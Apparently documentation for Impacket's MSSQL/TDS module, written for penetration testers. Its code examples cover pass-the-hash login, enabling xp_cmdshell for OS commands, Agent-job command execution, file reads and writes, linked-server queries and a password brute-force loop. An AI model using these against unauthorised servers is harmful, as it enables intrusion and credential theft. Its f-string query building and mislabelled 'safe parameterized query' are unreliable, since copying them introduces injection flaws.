MSSQL Protocol
Impacket’s TDS (Tabular Data Stream) implementation provides comprehensive support for connecting to and interacting with Microsoft SQL Server, including authentication, query execution, and advanced features.Overview
The TDS protocol implementation is located inimpacket/tds.py and includes:
- Authentication - Windows authentication (NTLM/Kerberos), SQL authentication
- Query execution - Execute SQL queries and stored procedures
- Multiple result sets - Handle complex query results
- Encryption - TLS encryption for secure connections
TDS Protocol
TDS (Tabular Data Stream) is Microsoft’s application-level protocol for SQL Server communication. Impacket implements TDS 7.0+ for compatibility with modern SQL Server versions.
Connection and Authentication
Basic Connection
Fromtds.py:1-100:
from impacket.tds import MSSQL
# Connect to SQL Server
ms_sql = MSSQL(
address='192.168.1.10',
port=1433
)
ms_sql.connect()
print("[+] Connected to SQL Server")
SQL Authentication
from impacket.tds import MSSQL
# SQL Server authentication
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
# Login with SQL credentials
ms_sql.login(
database='master',
username='sa',
password='P@ssw0rd',
domain='',
hashes='' # Leave empty for password auth
)
print("[+] Authenticated as sa")
Windows Authentication (NTLM)
from impacket.tds import MSSQL
# Windows authentication
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
# Login with domain credentials
ms_sql.login(
database='master',
username='jdoe',
password='P@ssw0rd',
domain='CORP',
hashes=''
)
print("[+] Authenticated as CORP\\jdoe")
# Or with NTLM hash (Pass-the-Hash)
ms_sql.login(
database='master',
username='jdoe',
password='',
domain='CORP',
hashes='aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
)
Kerberos Authentication
from impacket.tds import MSSQL
# Kerberos authentication
ms_sql = MSSQL('sql01.corp.local', port=1433)
ms_sql.connect()
ms_sql.kerberosLogin(
database='master',
username='jdoe',
password='P@ssw0rd',
domain='CORP.LOCAL',
kdcHost='dc01.corp.local'
)
print("[+] Authenticated via Kerberos")
# With AES key
ms_sql.kerberosLogin(
database='master',
username='jdoe',
password='',
domain='CORP.LOCAL',
aesKey='e5c4d39c...',
kdcHost='dc01.corp.local'
)
Query Execution
Execute Query
from impacket.tds import MSSQL
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')
# Execute SELECT query
ms_sql.sql_query("SELECT @@VERSION")
# Get results
result = ms_sql.printReplies()
print(result)
# Disconnect
ms_sql.disconnect()
Multiple Queries
# Execute multiple statements
query = """
SELECT name, database_id FROM sys.databases;
SELECT name FROM sys.tables WHERE type = 'U';
"""
ms_sql.sql_query(query)
ms_sql.printReplies()
Parameterized Queries
# Safe parameterized query
query = "SELECT * FROM users WHERE username = ?"
ms_sql.sql_query(query)
# Note: Impacket's TDS implementation handles basic queries
# For complex parameterized queries, use RPC calls
Information Gathering
Enumerate Databases
def enum_databases(ms_sql):
"""
List all databases
"""
query = """
SELECT
name,
database_id,
create_date,
state_desc
FROM sys.databases
ORDER BY name
"""
ms_sql.sql_query(query)
return ms_sql.printReplies()
# Usage
ms_sql = MSSQL('192.168.1.10')
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')
print("[*] Databases:")
result = enum_databases(ms_sql)
print(result)
Enumerate Tables
def enum_tables(ms_sql, database='master'):
"""
List all tables in database
"""
query = f"""
USE [{database}];
SELECT
TABLE_SCHEMA,
TABLE_NAME,
TABLE_TYPE
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
ORDER BY TABLE_NAME
"""
ms_sql.sql_query(query)
return ms_sql.printReplies()
# Usage
print("[*] Tables in 'master':")
result = enum_tables(ms_sql, 'master')
print(result)
Enumerate Users and Logins
def enum_logins(ms_sql):
"""
Enumerate SQL Server logins
"""
query = """
SELECT
name,
type_desc,
is_disabled,
create_date,
modify_date
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
ORDER BY name
"""
ms_sql.sql_query(query)
return ms_sql.printReplies()
def enum_database_users(ms_sql, database='master'):
"""
Enumerate users in specific database
"""
query = f"""
USE [{database}];
SELECT
name,
type_desc,
create_date,
modify_date
FROM sys.database_principals
WHERE type IN ('S', 'U', 'G')
ORDER BY name
"""
ms_sql.sql_query(query)
return ms_sql.printReplies()
Check Privileges
def check_privileges(ms_sql):
"""
Check current user privileges
"""
queries = {
'Current User': "SELECT SYSTEM_USER, USER_NAME()",
'Server Role': "SELECT IS_SRVROLEMEMBER('sysadmin')",
'Public Role': "SELECT IS_SRVROLEMEMBER('public')",
'Database Owner': "SELECT IS_MEMBER('db_owner')",
}
for name, query in queries.items():
ms_sql.sql_query(query)
result = ms_sql.printReplies()
print(f"{name}: {result}")
# Check if sysadmin
ms_sql.sql_query("SELECT IS_SRVROLEMEMBER('sysadmin')")
result = ms_sql.printReplies()
if '1' in result:
print("[+] Current user has sysadmin privileges!")
else:
print("[-] Not a sysadmin")
Advanced Features
xp_cmdshell Execution
xp_cmdshell allows OS command execution and requires sysadmin privileges. Use responsibly and only on systems you’re authorized to test.
def enable_xp_cmdshell(ms_sql):
"""
Enable xp_cmdshell (requires sysadmin)
"""
queries = [
"EXEC sp_configure 'show advanced options', 1",
"RECONFIGURE",
"EXEC sp_configure 'xp_cmdshell', 1",
"RECONFIGURE"
]
for query in queries:
ms_sql.sql_query(query)
ms_sql.printReplies()
print("[+] xp_cmdshell enabled")
def exec_xp_cmdshell(ms_sql, command):
"""
Execute OS command via xp_cmdshell
"""
query = f"EXEC xp_cmdshell '{command}'"
ms_sql.sql_query(query)
return ms_sql.printReplies()
# Usage
ms_sql = MSSQL('192.168.1.10')
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')
enable_xp_cmdshell(ms_sql)
result = exec_xp_cmdshell(ms_sql, 'whoami')
print(f"Command output: {result}")
File Operations
def read_file(ms_sql, filepath):
"""
Read file using OPENROWSET (requires BULK permissions)
"""
query = f"""
SELECT BulkColumn
FROM OPENROWSET(
BULK '{filepath}',
SINGLE_BLOB
) AS x
"""
ms_sql.sql_query(query)
return ms_sql.printReplies()
def write_file(ms_sql, filepath, content):
"""
Write file using xp_cmdshell
"""
# Escape single quotes
content_escaped = content.replace("'", "''")
command = f"echo {content_escaped} > {filepath}"
query = f"EXEC xp_cmdshell '{command}'"
ms_sql.sql_query(query)
return ms_sql.printReplies()
# Read Windows hosts file
result = read_file(ms_sql, 'C:\\Windows\\System32\\drivers\\etc\\hosts')
print(result)
Linked Servers
def enum_linked_servers(ms_sql):
"""
Enumerate linked servers
"""
query = "EXEC sp_linkedservers"
ms_sql.sql_query(query)
return ms_sql.printReplies()
def query_linked_server(ms_sql, linked_server, query):
"""
Execute query on linked server
"""
full_query = f"EXEC('{query}') AT [{linked_server}]"
ms_sql.sql_query(full_query)
return ms_sql.printReplies()
# Usage
print("[*] Linked servers:")
linked = enum_linked_servers(ms_sql)
print(linked)
# Query linked server
result = query_linked_server(
ms_sql,
'LINKEDSRV',
'SELECT @@VERSION'
)
print(result)
SQL Server Agent Jobs
def enum_agent_jobs(ms_sql):
"""
Enumerate SQL Server Agent jobs
"""
query = """
SELECT
job_id,
name,
enabled,
date_created,
date_modified
FROM msdb.dbo.sysjobs
ORDER BY name
"""
ms_sql.sql_query(query)
return ms_sql.printReplies()
def create_agent_job(ms_sql, job_name, command):
"""
Create SQL Agent job for command execution
"""
queries = [
f"USE msdb",
f"EXEC dbo.sp_add_job @job_name = N'{job_name}'",
f"""EXEC sp_add_jobstep
@job_name = N'{job_name}',
@step_name = N'Execute',
@subsystem = N'CMDEXEC',
@command = N'{command}'""",
f"EXEC sp_add_jobserver @job_name = N'{job_name}'",
f"EXEC sp_start_job @job_name = N'{job_name}'"
]
for query in queries:
ms_sql.sql_query(query)
ms_sql.printReplies()
TDS Protocol Details
Packet Types
Fromtds.py:117-127:
# TDS packet types
TDS_SQL_BATCH = 1 # SQL batch
TDS_PRE_TDS_LOGIN = 2 # Pre-login
TDS_RPC = 3 # RPC request
TDS_TABULAR = 4 # Tabular result
TDS_ATTENTION = 6 # Attention (cancel)
TDS_BULK_LOAD_DATA = 7 # Bulk load
TDS_TRANSACTION = 14 # Transaction manager
TDS_LOGIN7 = 16 # TDS 7.0+ login
TDS_SSPI = 17 # SSPI message
TDS_PRE_LOGIN = 18 # Pre-login message
Encryption
TDS supports TLS encryption for secure communication. Encryption is negotiated during the pre-login phase.
from impacket.tds import MSSQL, TDS_ENCRYPT_ON, TDS_ENCRYPT_REQ
# Force encryption (from tds.py:136-139)
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
# Encryption negotiated automatically during login
# TDS_ENCRYPT_OFF = 0 # No encryption
# TDS_ENCRYPT_ON = 1 # Encryption on
# TDS_ENCRYPT_NOT_SUP = 2 # Not supported
# TDS_ENCRYPT_REQ = 3 # Required
Security Testing
Bruteforce Authentication
def bruteforce_sql_auth(target, usernames, passwords):
"""
Attempt SQL authentication with username/password lists
"""
for username in usernames:
for password in passwords:
try:
ms_sql = MSSQL(target, port=1433)
ms_sql.connect()
ms_sql.login('master', username, password)
print(f"[+] SUCCESS: {username}:{password}")
ms_sql.disconnect()
return (username, password)
except Exception as e:
print(f"[-] Failed: {username}:{password}")
continue
return None
# Usage
usernames = ['sa', 'admin', 'sqlserver']
passwords = ['', 'password', 'P@ssw0rd', 'admin']
creds = bruteforce_sql_auth('192.168.1.10', usernames, passwords)
if creds:
print(f"\n[+] Valid credentials found: {creds[0]}:{creds[1]}")
Enumerate SPNs
def find_mssql_spns(ldap_conn, domain):
"""
Find MSSQL SPNs in Active Directory
"""
from impacket.ldap.ldapasn1 import SearchResultEntry
ldap_filter = '(servicePrincipalName=MSSQLSvc/*)'
attributes = ['servicePrincipalName', 'sAMAccountName', 'dNSHostName']
ldap_conn.search(
searchFilter=ldap_filter,
attributes=attributes
)
mssql_servers = []
for entry in ldap_conn.getResponseIterator():
if isinstance(entry, SearchResultEntry):
server = {}
for attr in entry['attributes']:
name = str(attr['type'])
values = [str(val) for val in attr['vals']]
server[name] = values
mssql_servers.append(server)
return mssql_servers
# Find all SQL Servers in domain
for server in find_mssql_spns(ldap_conn, 'CORP.LOCAL'):
print(f"SQL Server: {server.get('dNSHostName', ['Unknown'])[0]}")
for spn in server.get('servicePrincipalName', []):
print(f" - {spn}")
Error Handling
Always handle SQL exceptions properly to avoid crashes and information disclosure.
from impacket.tds import MSSQL, SQLErrorException
try:
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
ms_sql.login('master', 'sa', 'wrong_password')
except SQLErrorException as e:
print(f"SQL Error: {e}")
except Exception as e:
print(f"Connection Error: {e}")
finally:
if ms_sql:
ms_sql.disconnect()
Complete Example: SQL Server Client
from impacket.tds import MSSQL
import sys
def sql_client(target, username, password, database='master', domain=''):
"""
Interactive SQL Server client
"""
ms_sql = MSSQL(target, port=1433)
try:
print(f"[*] Connecting to {target}:1433...")
ms_sql.connect()
print(f"[*] Authenticating as {username}...")
ms_sql.login(
database=database,
username=username,
password=password,
domain=domain
)
print("[+] Authentication successful\n")
# Get version
ms_sql.sql_query("SELECT @@VERSION")
version = ms_sql.printReplies()
print(f"[*] SQL Server Version:\n{version}\n")
# Check privileges
ms_sql.sql_query("SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')")
privs = ms_sql.printReplies()
print(f"[*] Current User: {privs}\n")
# List databases
print("[*] Databases:")
ms_sql.sql_query("SELECT name FROM sys.databases ORDER BY name")
dbs = ms_sql.printReplies()
print(dbs)
# Interactive mode
print("\n[*] Entering interactive mode (type 'exit' to quit)\n")
while True:
query = input("SQL> ")
if query.lower() in ['exit', 'quit']:
break
if not query.strip():
continue
try:
ms_sql.sql_query(query)
result = ms_sql.printReplies()
print(result)
except Exception as e:
print(f"Error: {e}")
except Exception as e:
print(f"[-] Error: {e}")
return 1
finally:
ms_sql.disconnect()
print("\n[*] Disconnected")
return 0
if __name__ == '__main__':
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <target> <username> <password> [domain]")
sys.exit(1)
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
domain = sys.argv[4] if len(sys.argv) > 4 else ''
sys.exit(sql_client(target, username, password, domain=domain))
Port Discovery
SQL Server Browser (UDP 1434)
Fromtds.py:70-76:
import socket
from impacket.tds import SQLR_CLNT_UCAST_INST, SQLR_Response
def query_sql_browser(target, instance=''):
"""
Query SQL Server Browser service for instances
"""
# SQL Browser port
SQLR_PORT = 1434
# Create request
request = SQLR_CLNT_UCAST_INST()
request['Instance'] = instance.encode() + b'\x00'
# Send UDP request
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
sock.sendto(request.getData(), (target, SQLR_PORT))
# Receive response
data, _ = sock.recvfrom(4096)
sock.close()
# Parse response
response = SQLR_Response(data)
return response['Data'].decode()
# Discover SQL instances
instances = query_sql_browser('192.168.1.10')
print(f"SQL Instances:\n{instances}")
Related Topics
References
- Source:
impacket/tds.py - [MS-TDS]: Tabular Data Stream Protocol
- [MC-SQLR]: SQL Server Resolution Protocol